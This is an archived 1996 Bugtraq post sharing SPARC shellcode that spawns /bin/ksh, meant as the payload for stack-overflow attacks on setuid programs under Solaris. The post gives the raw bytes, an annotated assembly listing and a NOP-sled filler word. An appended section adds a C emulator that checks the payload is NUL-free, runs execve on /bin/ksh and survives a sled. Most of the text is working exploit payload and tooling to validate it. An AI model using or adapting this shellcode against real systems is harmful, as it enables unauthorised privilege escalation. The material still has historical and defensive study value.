[3731] in bugtraq
Subject: /bin/ksh sparc code
daemon@ATHENA.MIT.EDU (Kichang Yang)
Tue Dec 3 14:40:58 1996
Date: Tue, 3 Dec 1996 20:22:22 +0900
Reply-To: Kichang Yang <zomo@home.serome.co.kr>
From: Kichang Yang <zomo@home.serome.co.kr>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
It seems that the "smashin' the stack" attack (the term is borrowed from
Aleph1's article) is the hottest topic on bugtraq these days
(except for the symlink-to-/.rhosts attack, of course).
If I remember correctly, the sparc code that appeared on bugtraq
does something like execl("/bin/sh","sh",0), and, as you know,
Solaris 2.4 /bin/sh does setuid(getuid()) unless "-p" is specified,
so it's kinda useless when it comes to attacking setuid'ed files.
So, I made sparc code for doing something *like* execl("/bin/ksh","ksh",0).
I know it's no big deal, almost close to lame, but I think it's kinda
useful. You might like to check out Aleph1's article that appeared (or will?)
in Phrack 49.
I tested it on sun4d and I'm not sure it would work on other architectures.
Bye.
-- ksh.sparc.code.c
/* SPARC_NOP is "or %l6, 0x16e, %l6": no NUL bytes, and %l6 is rewritten by
   the first sethi of the code anyway, so it is safe as sled filler. */
#define SPARC_NOP 0xac15a16e
char ksh_sparc_shellcode[] =
"\x2d\x0b\xd8\x9a"   /* sethi %hi(0x2f626800), %l6                  */
"\xac\x15\xa1\x6e"   /* or    %l6, 0x16e, %l6       %l6 = "/bin"    */
"\x2f\x0b\xda\xdc"   /* sethi %hi(0x2f6b7000), %l7                  */
"\xae\x15\xe3\x68"   /* or    %l7, 0x368, %l7       %l7 = "/ksh"    */
"\x90\x0b\x80\x0e"   /* and   %sp, %sp, %o0         path = old %sp  */
"\x92\x03\xa0\x0c"   /* add   %sp, 12, %o1          argv            */
"\x94\x1a\x80\x0a"   /* xor   %o2, %o2, %o2         envp = NULL     */
"\x9c\x03\xa0\x14"   /* add   %sp, 20, %sp                          */
"\xec\x3b\xbf\xec"   /* std   %l6, [%sp - 20]       "/bin/ksh"      */
"\xc0\x23\xbf\xf4"   /* st    %g0, [%sp - 12]       NUL terminator  */
"\xdc\x23\xbf\xf8"   /* st    %sp, [%sp - 8]        argv[0]         */
"\xc0\x23\xbf\xfc"   /* st    %g0, [%sp - 4]        argv[1] = NULL  */
"\x82\x10\x20\x3b"   /* mov   0x3b, %g1             SYS_execve      */
"\x91\xd0\x20\x08"   /* ta    8                                     */
"\x90\x1b\xc0\x0f"   /* xor   %o7, %o7, %o0         %o0 = 0         */
"\x82\x10\x20\x01"   /* mov   1, %g1                SYS_exit        */
"\x91\xd0\x20\x08";  /* ta    8                                     */
-- ksh.sparc.s
	.section ".data1"
	.align 4
.L16:
	.ascii "ksh.sparc.code goes\n\0"
	.section ".text"
	.global main
main:
	save %sp, -96, %sp
	set .L16, %o0
	call printf, 1
	nop
! ---- the shellcode proper starts here; the bytes in ksh.sparc.code.c are these instructions ----
	sethi %hi(0x2f626800), %l6	! %l6 = "/bh\0"
	or %l6, 0x16e, %l6		! %l6 = "/bin"
	sethi %hi(0x2f6b7000), %l7	! %l7 = "/kp\0"
	or %l7, 0x368, %l7		! %l7 = "/ksh", so %l6:%l7 = "/bin/ksh"
	and %sp, %sp, %o0		! %o0 = path = old %sp (and instead of mov: no NUL bytes)
	add %sp, 12, %o1		! %o1 = argv = old %sp + 12
	xor %o2, %o2, %o2		! %o2 = envp = NULL
	add %sp, 20, %sp		! room for 8 bytes path, 4 NUL, argv[0], argv[1]
	std %l6, [%sp - 20]		! "/bin/ksh" at old %sp
	st %g0, [%sp - 12]		! NUL terminator for the path
	st %sp, [%sp - 8]		! argv[0] = new %sp (a non-NULL pointer, not the path)
	st %g0, [%sp - 4]		! argv[1] = NULL
	mov 0x3b, %g1			! SYS_execve
	ta 8				! system call trap: execve(path, argv, NULL)
	xor %o7, %o7, %o0		! %o0 = 0
	mov 1, %g1			! SYS_exit
	ta 8				! exit(0) if execve ever returns
! ---- end of shellcode ----
	restore
--
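As an added example (not part of the post or the poster's code): without a sun4d to hand, the posted bytes can still be checked offline by stepping them through a small, assumed model of a SPARC: 32 registers, a 256-byte stack addressed by offset, and only the instruction forms the code uses (sethi, add/and/or/xor, st/std, ta). The syscall numbers 0x3b and 1 are the ones the post loads into %g1 (SYS_execve and SYS_exit on Solaris 2.x). The program reports whether the bytes are NUL-free, which string %o0 points at when the trap fires, how argv is laid out, and whether a sled of the post's SPARC_NOP in front of the code changes anything.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The bytes from ksh.sparc.code.c in the post, unchanged. */
static const unsigned char ksh_sc[] =
    "\x2d\x0b\xd8\x9a" "\xac\x15\xa1\x6e" "\x2f\x0b\xda\xdc" "\xae\x15\xe3\x68"
    "\x90\x0b\x80\x0e" "\x92\x03\xa0\x0c" "\x94\x1a\x80\x0a" "\x9c\x03\xa0\x14"
    "\xec\x3b\xbf\xec" "\xc0\x23\xbf\xf4" "\xdc\x23\xbf\xf8" "\xc0\x23\xbf\xfc"
    "\x82\x10\x20\x3b" "\x91\xd0\x20\x08" "\x90\x1b\xc0\x0f" "\x82\x10\x20\x01"
    "\x91\xd0\x20\x08";
#define KSH_SC_LEN (sizeof ksh_sc - 1)
#define SPARC_NOP  0xac15a16e   /* the post's filler word: or %l6, 0x16e, %l6 */

struct sc_result {
    int nul_free;       /* 1 if no 0x00 byte, so a strcpy()-style overflow copies it whole */
    int syscall_nr;     /* %g1 at the first "ta 8" (0x3b = SYS_execve on Solaris 2.x) */
    char path[32];      /* the string %o0 points at when that trap fires */
    int argc;           /* entries before the NULL in the vector %o1 points at */
    int argv0_is_path;  /* 1 if argv[0] points at the same bytes as %o0 */
    int exit_code;      /* %o0 at the second trap (%g1 = 1 = SYS_exit) */
};

static uint32_t rd32(const uint8_t *m, uint32_t a)
{ return (uint32_t)m[a] << 24 | (uint32_t)m[a + 1] << 16 | (uint32_t)m[a + 2] << 8 | m[a + 3]; }
static void wr32(uint8_t *m, uint32_t a, uint32_t v)
{ m[a] = v >> 24; m[a + 1] = v >> 16; m[a + 2] = v >> 8; m[a + 3] = v; }

/* Toy SPARC (an assumed model, not a real CPU): 32 registers, a 256-byte "stack"
 * addressed by offset, and only the forms this code uses (sethi, add/and/or/xor,
 * st/std, ta). Returns the number of traps executed, or -1 on anything unmodelled. */
int emulate_sparc_shellcode(const unsigned char *sc, size_t len, struct sc_result *r)
{
    uint32_t reg[32] = {0};
    uint8_t mem[256] = {0};
    int traps = 0;
    size_t n;
    memset(r, 0, sizeof *r);
    r->nul_free = (memchr(sc, 0, len) == NULL);
    reg[14] = 128;                                  /* %sp starts mid-buffer */
    if (len % 4) return -1;
    for (size_t pc = 0; pc < len; pc += 4) {
        uint32_t w = rd32(sc, pc);
        uint32_t op = w >> 30, rd = (w >> 25) & 31, op3 = (w >> 19) & 0x3f, rs1 = (w >> 14) & 31;
        /* second operand: sign-extended simm13 when i=1, otherwise register rs2 */
        uint32_t src2 = (w & 0x2000) ? (uint32_t)(((int32_t)(w & 0x1fff) ^ 0x1000) - 0x1000) : reg[w & 31];
        uint32_t ea = reg[rs1] + src2;              /* address for st/std, trap number for ta */
        if (op == 0 && ((w >> 22) & 7) == 4) {      /* sethi %hi(imm22), rd */
            reg[rd] = (w & 0x3fffff) << 10;
        } else if (op == 2) {
            switch (op3) {
            case 0x00: reg[rd] = reg[rs1] + src2; break;    /* add */
            case 0x01: reg[rd] = reg[rs1] & src2; break;    /* and */
            case 0x02: reg[rd] = reg[rs1] | src2; break;    /* or  */
            case 0x03: reg[rd] = reg[rs1] ^ src2; break;    /* xor */
            case 0x3a:                                      /* ta: only trap 8 (system call) */
                if ((ea & 0x7f) != 8) return -1;
                if (++traps == 2) { r->exit_code = reg[8]; break; }   /* second trap: the exit */
                r->syscall_nr = reg[1];                     /* first trap: the execve */
                for (n = 0; n + 1 < sizeof r->path && reg[8] + n < sizeof mem && mem[reg[8] + n]; n++)
                    r->path[n] = mem[reg[8] + n];
                while (reg[9] + 4 * r->argc + 4 <= sizeof mem && rd32(mem, reg[9] + 4 * r->argc))
                    r->argc++;
                r->argv0_is_path = reg[9] + 4 <= sizeof mem && rd32(mem, reg[9]) == reg[8];
                break;
            default: return -1;
            }
        } else if (op == 3 && (op3 == 0x04 || op3 == 0x07)) {   /* st / std rd, [ea] */
            if (ea > sizeof mem - 8) return -1;
            wr32(mem, ea, reg[rd]);
            if (op3 == 0x07) wr32(mem, ea + 4, reg[rd | 1]);
        } else {
            return -1;
        }
        reg[0] = 0;                                 /* %g0 always reads as zero */
    }
    return traps;
}

/* Run the posted bytes once; anything unexpected leaves an all-zero result. */
const struct sc_result *analyze_ksh_shellcode(void)
{
    static struct sc_result r;
    if (emulate_sparc_shellcode(ksh_sc, KSH_SC_LEN, &r) != 2) memset(&r, 0, sizeof r);
    return &r;
}

/* A sled of up to 16 SPARC_NOPs in front of the code must not change what it does. */
int ksh_survives_nop_sled(int nops)
{
    unsigned char buf[4 * 16 + KSH_SC_LEN];
    struct sc_result r;
    if (nops < 0 || nops > 16) return 0;
    for (int i = 0; i < nops; i++) wr32(buf, 4 * i, SPARC_NOP);
    memcpy(buf + 4 * nops, ksh_sc, KSH_SC_LEN);
    return emulate_sparc_shellcode(buf, 4 * nops + KSH_SC_LEN, &r) == 2 && r.syscall_nr == 0x3b && !strcmp(r.path, "/bin/ksh");
}

int main(void)
{
    const struct sc_result *r = analyze_ksh_shellcode();
    printf("NUL-free %d; syscall %#x(\"%s\", argc %d, argv[0]==path %d, NULL); then exit(%d); 8-NOP sled ok %d\n",
           r->nul_free, r->syscall_nr, r->path, r->argc, r->argv0_is_path, r->exit_code, ksh_survives_nop_sled(8));
    return 0;
}
```

Two things the model makes visible that the raw bytes do not: the code contains no NUL byte (the `and %sp,%sp,%o0` and the sethi/or pairs are there for exactly that reason), and argv[0] is the new %sp, a non-NULL pointer to whatever lies 20 bytes above the old stack pointer rather than to "/bin/ksh" itself, which is the sense in which the post says it does something *like* execl("/bin/ksh","ksh",0).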